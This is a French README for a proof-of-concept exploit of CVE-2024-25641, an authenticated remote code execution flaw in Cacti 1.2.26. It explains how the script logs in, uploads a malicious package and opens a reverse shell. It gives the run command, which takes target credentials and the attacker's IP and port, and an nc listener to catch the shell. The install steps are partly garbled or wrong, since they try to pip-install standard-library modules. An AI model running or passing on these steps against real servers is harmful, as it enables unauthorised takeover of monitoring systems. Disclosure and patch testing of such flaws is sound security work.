
PoC pour CVE-2024-25641 RCE authentifiée sur Cacti v1.2.26
Ce script est une preuve de concept (PoC) pour l'exploitation de la vulnérabilité CVE-2024-25641 dans Cacti, un outil de surveillance basé sur le web. Le script automatise le processus d'authentification auprès de l'application, de téléchargement d'un paquet malveillant et de déclenchement d'un reverse shell.
requestsargparsereVous pouvez installer la bibliothèque Python requise avec pip3 :
pip3 install requests
pip3 install argparse
pip3 install re
(assurez-vous de placer le test.xml.gz dans le même répertoire que exploit.py)
python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]
nc -nvlp <port>